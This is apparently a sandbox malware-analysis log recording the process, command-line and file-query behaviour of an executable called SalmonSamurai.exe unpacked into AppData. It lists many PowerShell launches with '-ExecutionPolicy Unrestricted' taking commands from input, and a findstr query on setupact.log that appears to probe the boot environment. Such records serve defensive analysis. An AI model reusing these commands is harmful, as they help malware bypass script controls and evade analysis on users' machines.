Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "c:\users\user\appdata\roaming\nsisextracted\salmonsamurai.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users\user\AppData\Roaming\NsisExtracted\resources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
